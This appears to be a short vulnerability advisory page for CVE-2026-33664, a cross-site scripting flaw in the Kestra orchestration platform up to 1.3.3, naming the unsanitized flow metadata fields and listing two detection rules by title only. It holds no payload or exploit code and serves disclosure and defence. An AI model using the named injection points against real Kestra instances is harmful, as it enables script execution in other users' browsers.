Kestra Orchestration Platform XSS Vulnerability (CVE-2026-33664)
Kestra versions up to 1.3.3 are vulnerable to a cross-site scripting (XSS) vulnerability (CVE-2026-33664) allowing arbitrary JavaScript execution by viewing crafted flow metadata.
Kestra, an open-source, event-driven orchestration platform, is vulnerable to a reflected cross-site scripting (XSS) vulnerability, identified as CVE-2026-33664. This flaw resides in versions up to and including 1.3.3. The application fails to properly sanitize user-supplied flow YAML metadata fields, specifically description, inputs[].displayName, and inputs[].description. These fields are rendered through the Markdown.vue component with html: true, resulting in unsanitized HTML…
Detection coverage 2
Detect Suspicious Kestra Flow Metadata with JavaScript Injection
highDetects potential XSS attacks in Kestra by identifying suspicious patterns indicative of JavaScript injection in flow metadata.
Detect Suspicious Kestra Flow Metadata with JavaScript Event Handlers
highDetects potential XSS attacks in Kestra by identifying suspicious patterns indicative of JavaScript injection in flow metadata using event handlers.
Detection queries are kept inside the platform. Get full rules →